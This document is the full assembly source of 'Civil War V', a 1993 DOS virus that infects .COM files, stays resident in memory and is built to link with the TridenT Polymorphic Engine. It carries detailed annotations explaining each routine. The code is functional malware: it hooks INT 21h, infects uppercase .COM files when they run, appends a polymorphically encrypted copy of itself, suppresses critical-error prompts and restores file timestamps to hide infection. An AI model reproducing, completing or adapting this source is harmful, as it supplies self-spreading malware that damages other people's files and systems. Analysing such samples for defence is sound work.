;****************************************************************************
; Civil War V V1.0 *
; *
; Assembled with Tasm 2.5 *
; (c) Jan '93 [ Dark Helmet / TridenT ], The Netherlands *
; *
;****************************************************************************
; *
; This is an example virus for the TPE engine. *
; We are not responsible if you use the TPE in an illegal or naughty way. *
; The TridenT Polymorphic Engine version 1.3 should be used for linking *
; with this virus. *
; *
;****************************************************************************
.model tiny                              ; single-segment COM image: CS=DS=ES=SS at load
.radix 16                                ; NOTE: default radix is HEX - bare numbers
                                         ; below (5a, 0003, 0012, 0100 ...) are hex
.code
org 100h                                 ; COM load offset; `dummy` sits at 100h
extrn rnd_init:near                      ; TPE 1.3 entry points, linked in separately
extrn rnd_get:near                       ; (see header). Their register contracts are
extrn crypt:near                         ; not visible in this file.
extrn tpe_top:near                       ; end label of the linked engine
len equ offset tpe_top - begin           ; bytes from `begin` to the end of the engine:
                                         ; the size copied resident (install_virus) and
                                         ; appended to every host (write_virus)
;----------------------------------------------------------------------------
; Installer. Runs inside the host image (or the dropper). Layout: `dummy`
; (6 bytes at 100h) is the dropper's pseudo-host, so `begin` is at 106h. The
; resident copy made below starts at `begin` but is placed at offset 100h, i.e.
; 6 bytes below its assembled address - that is why every data reference in the
; resident code (main_virus and helpers) carries an explicit -6.
; BP = load delta: assembled offset -> actual offset inside an infected host.
;----------------------------------------------------------------------------
dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; E9 0003 = jmp begin (106h), then the
                                        ; infection marker 'D','H' and a pad byte
begin: Call virus ; pushes the return IP (offset virus + delta)
virus: pop bp ; BP = actual offset of `virus`
sub bp,offset virus ; BP = delta (0 when run as this dropper)
restore_host: mov di,0100h ; put the host's original first 6 bytes back
lea si,ds:[carrier_begin+bp] ; at 100h (saved in carrier_begin at infection)
mov cx,06h
rep movsb ; DS=ES=CS=PSP here (COM image)
check_resident: mov ah,0a0h ; installation check: the resident handler
int 21h ; answers AH=A0h with AX=0008h (see main_virus)
cmp ax,0008h
je end_virus ; already resident -> just run the host
adjust_memory: mov ax,cs ; DS = this program's MCB (segment PSP-1)
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5a ; 5a hex = 'Z': only continue if this is the
                          ; last block of the MCB chain
jne abort ; otherwise no hook; the host runs normally
mov ax,ds:[0003] ; MCB size in paragraphs, shrunk by 200h
sub ax,200h ; paragraphs (8 KiB) to carve a hole above the
mov ds:[0003],ax ; host that DOS will not hand out again
sub word ptr ds:[0012],200h ; same correction on PSP:0002 (top-of-memory
                            ; field), addressed from the MCB segment
install_virus: call RND_init ; TPE entry; what it returns is not visible
mov bx,ax ; in this file. AX is used as a paragraph
mov ax,es ; offset: ES := PSP + AX is the copy destination.
add ax,bx ; NOTE(review): the destination is not derived
mov es,ax ; from the freed region at the top of the MCB -
          ; check rnd_init's contract in TPE 1.3.
mov cx,len ; bytes to copy: `begin` .. tpe_top
mov ax,ds ; DS back to the PSP (MCB + 1)
inc ax
mov ds,ax
lea si,ds:[begin+bp] ; source: the (delta-adjusted) body
lea di,es:0100 ; destination offset 100h: `begin` lands 6 bytes
rep movsb ; below its assembled offset (the -6 corrections)
mov [virus_segment+bp],es ; remember where the resident copy lives
mov ax,cs ; ES back to the PSP
mov es,ax
hook_vector: cli ; install the INT 21h hook with interrupts off
mov ax,3521h ; ES:BX = current INT 21h vector
int 21h
mov ds,[virus_segment+bp] ; DS = resident copy; the -6 below compensates
mov old_21h-6h,bx ; for the shifted copy
mov old_21h+2-6h,es
mov dx,offset main_virus - 6h ; DS:DX = resident main_virus
mov ax,2521h ; set INT 21h vector
int 21h
sti
abort: mov ax,cs ; DS/ES = PSP again for the host
mov ds,ax
mov es,ax
end_virus: mov bx,0100h ; transfer to the restored host image at 100h
jmp bx
;*****************************************************************************
;*****************************************************************************
; Resident INT 21h handler. Executes from the relocated copy, hence the -6 on
; every data reference (the copy starts at `begin` but sits at offset 100h).
; Two services:
;   AH=A0h          -> returns AX=0008h (installation check, see check_resident)
;   AX=4B00h (EXEC) -> if the path ends in uppercase "COM", infect the file,
;                      then chain to the original handler; all else chains.
; While infecting it runs on a private stack (CS+150h:100h); DOS calls go
; through do_int21h (far call to the saved vector), so this hook is not
; re-entered from inside the infection routine.
;*****************************************************************************
main_virus: pushf
cmp ah,0a0h ; installation check?
jne new_21h ; no -> normal processing
mov ax,0008h ; yes -> answer with the id and return
popf
iret
new_21h: push ds ; save every register touched below
push es ; (restored at continu)
push di
push si
push ax
push bx
push cx
push dx
check_exec: cmp ax,04b00h ; only EXEC "load and execute" is intercepted
je chk_com
continu: pop dx ; restore registers, pop the flags and
pop cx ; far-jump to the saved vector: the original
pop bx ; handler's IRET then returns straight to the
pop ax ; caller
pop si
pop di
pop es
pop ds
popf
jmp dword ptr cs:[old_21h-6]
chk_com: mov cs:[name_seg-6],ds ; keep DS:DX = ASCIZ path of the program
mov cs:[name_off-6],dx ; being executed
cld ; scan forward for the first '.'
mov di,dx
push ds
pop es ; ES:DI = path
mov al,'.'
repne scasb ; NOTE: CX is not set here - the scan bound is
            ; whatever the EXEC caller left in CX (CX=0
            ; means no scan at all), and with no '.' in
            ; the string the scan runs past its end.
cmp word ptr es:[di],'OC' ; bytes after the '.' must be 'C','O'
jne continu ; (word 'OC' is little-endian "CO")
cmp word ptr es:[di+2],'M' ; then 'M',00h: the path must END in
jne continu ; uppercase ".COM"; lowercase is not matched
own_stack: cli ; switch to a private stack at CS+150h:100h
mov cs:[old_sp-6],sp ; (presumably inside the 8 KiB carved out at
mov cs:[old_ss-6],ss ; install - the stack top is CS:1600h)
mov ax,cs
add ax,150h
mov ss,ax
mov sp,100h
sti
call set_int24h ; silence critical errors (new_24h -> "fail")
call set_atribuut ; clear read-only on the target (never restored)
open_file: mov ds,cs:[name_seg-6] ; DS:DX = path
mov dx,cs:[name_off-6]
mov ax,3D02h ; open read/write through the original vector
call do_int21h
jc close_file ; NOTE: on failure `handle` is not updated, so
              ; close_file closes whatever handle is left
              ; over from a previous infection
mov cs:[handle-6],ax
mov bx,ax
call get_date ; save time/date so they can be put back
check_infect: mov bx,cs:[handle-6] ; read the first 6 bytes of the file into
mov ah,3fh ; carrier_begin (what restore_host later copies
mov cx,06h ; back to 100h inside the host)
lea dx,cs:[carrier_begin-6]
call do_int21h
push cs
pop ds
mov al, byte ptr [carrier_begin-6]+3 ; file bytes 3,4 hold the marker
mov ah, byte ptr [carrier_begin-6]+4 ; 'D','H' in an infected file
cmp ax,cs:[initials-6] ; (initials = 4844h = little-endian "DH")
je save_date ; already infected -> only restore the timestamp
get_lenght: mov ax,4200h ; seek to 0 ...
call move_pointer
mov ax,4202h ; ... then to EOF: AX = low word of the size
call move_pointer ; (DX, the high word, is ignored; there is no
sub ax,03h ; size check). AX-3 = displacement of a 3-byte
mov cs:[lenght_file-6],ax ; JMP at 100h that lands on EOF, where the body
call write_jmp ; is appended. Despite its name, lenght_file
call write_virus ; holds size-3, not the size.
save_date: mov bx,cs:[handle-6] ; put the original time/date back
mov dx,cs:[date-6]
mov cx,cs:[time-6]
mov ax,5701h
call do_int21h
close_file: mov bx,cs:[handle-6]
mov ah,03eh ; close handle
call do_int21h
mov dx,cs:[old_24h-6] ; restore INT 24h
mov ds,cs:[old_24h+2-6]
mov ax,2524h
call do_int21h
restore_stack: cli ; back to the caller's stack
mov sp,cs:[old_sp-6]
mov ss,cs:[old_ss-6]
sti
jmp continu ; hand the (now infected) EXEC to DOS
new_24h: mov al,03h ; INT 24h handler: AL=3 = "fail" the DOS call,
iret ; so no Abort/Retry/Fail prompt while infecting
;---------------------------------------------------------------------------
; PROCEDURES
;---------------------------------------------------------------------------
; move_pointer: LSEEK helper. Caller sets AX (4200h = from start,
; 4202h = from end); offset CX:DX is forced to 0 and BX = the saved handle.
; Leaves DS = CS. DOS returns DX:AX = new file position.
move_pointer: push cs
pop ds
mov bx,[handle-6]
xor cx,cx
xor dx,dx
call do_int21h
ret
; do_int21h: issue a DOS call through the ORIGINAL INT 21h vector.
; pushf + far call mimics an INT so the saved handler's IRET returns here,
; and main_virus is never re-entered from inside the infection routine.
do_int21h: pushf
call dword ptr cs:[old_21h-6]
ret
; write_jmp: overwrite the first 5 bytes of the host with
;   E9 <lenght_file> 'D' 'H'   (JMP to the appended body, then the marker).
; The host's original 6 bytes were already read into carrier_begin by
; check_infect; the 6th byte is left untouched. DS = CS after move_pointer.
write_jmp: mov ax,4200h ; seek to offset 0
call move_pointer
mov ah,40h ; byte 0: E9 (JMP rel16)
mov cx,01h
lea dx,[jump-6]
call do_int21h
mov ah,40h ; bytes 1-2: displacement = size-3 (set in get_lenght)
mov cx,02h
lea dx,[lenght_file-6]
call do_int21h
mov ah,40h ; bytes 3-4: 'D','H' infection marker
mov cx,02h
lea dx,[initials-6]
call do_int21h
ret ; NOTE: none of the three write results is checked
; write_virus: append the body, encrypted by TPE, to the end of the host.
; Registers handed to the engine: ES = work segment (CS+90h), DS:DX = code to
; encrypt (the resident copy at CS:100h, i.e. `begin` relocated), BP = offset
; at which the decryptor will execute inside the host (100h + size), CX = len,
; SI = 0 (distance between encryptor and decryptor).
; NOTE(review): what rnd_get/crypt return is not visible here; the AH=40h
; write below relies on crypt leaving DS:DX = output buffer and CX = its
; length - confirm against the TPE 1.3 interface.
write_virus: mov ax,4202h ; seek to EOF
call move_pointer
TPE_engine: mov ax,cs ; ES = TPE work segment, 90h paragraphs
add ax,90h ; (900h bytes) above the resident code
mov es,ax
push cs ; DS:DX = plaintext: the resident copy at CS:100h
pop ds
mov dx,100h
mov bp,[lenght_file-6] ; BP = (size-3) + 103h = 100h + size: where
add bp,103h ; the appended code will run in the host
mov cx,len ; bytes to encrypt (begin .. tpe_top)
xor si,si ; distance encryptor/decryptor = 0
call rnd_get ; AX = random value selecting the encryption type
call crypt ; build decryptor + encrypted body
mov bx,cs:[handle-6] ; write the engine output at EOF
mov ah,40h ; (result not checked)
call do_int21h
ret
; get_date: AX=5700h (get file time/date) on BX = handle (set by the caller);
; stores DX (date) and CX (time) for save_date. Leaves DS = CS.
get_date: mov ax,5700h
call do_int21h
push cs
pop ds
mov [date-6],dx
mov [time-6],cx
ret
; set_int24h: save the current INT 24h (critical error) vector and point it
; at new_24h, which answers every critical error with AL=3 ("fail") so no
; Abort/Retry/Fail prompt appears while a file is being infected.
; The vector is restored in close_file.
set_int24h: mov ax,3524h ; ES:BX = current vector
call do_int21h
mov cs:[old_24h-6],bx
mov cs:[old_24h+2-6],es
mov dx,offset new_24h-6 ; DS:DX = resident new_24h (-6: relocated copy)
push cs
pop ds
mov ax,2524h
call do_int21h
ret
; set_atribuut: clear the read-only bit of the target file so it can be opened
; for writing. AX=4300h returns CX = attributes; bit 0 is cleared and the
; result is written back with AX=4301h (other bits unchanged).
; NOTE: the original attribute is neither saved nor restored afterwards.
set_atribuut: mov ax,4300h ; get attributes -> CX
mov ds,cs:[name_seg-6] ; DS:DX = path saved in chk_com
mov dx,cs:[name_off-6]
call do_int21h
and cl,0feh ; clear bit 0 = read-only
mov ax,4301h ; set attributes from CX
call do_int21h
ret
;---------------------------------------------------------------------------
; DATA
;---------------------------------------------------------------------------
; All of this is addressed with an explicit -6 from the resident copy and with
; +BP from the installer (see the comments at `begin`).
virus_name db "Civil War V v1.0, (c) Jan '92" ; runtime string (not referenced
                                               ; in this file); says '92 while
                                               ; the header says Jan '93
old_21h dw 00h,00h ; saved INT 21h vector (offset, segment)
old_24h dw 00h,00h ; saved INT 24h vector (offset, segment)
old_ss dw ? ; caller's SS:SP while on the private stack
old_sp dw ?
carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h ; first 6 bytes of the host.
                                                   ; Initial value = the dropper's
                                                   ; own pseudo-host: nop; int 20h
                                                   ; (terminate); 'D','H'; pad
jump db 0e9h ; JMP rel16 opcode written to byte 0 of the host
name_seg dw ? ; DS:DX of the EXEC path, captured in chk_com
name_off dw ?
virus_segment dw ? ; segment of the resident copy (used by the installer)
lenght_file dw ? ; host size - 3 = JMP displacement (not the size)
handle dw ? ; open handle of the file being infected
date dw ? ; host's original date (DX) and time (CX),
time dw ? ; restored by save_date
initials dw 4844h ; 'D','H' marker compared at file bytes 3-4
writer db "[ DH / TridenT ]" ; runtime string (not referenced in this file)
end dummy ; entry point = dummy (the JMP at 100h)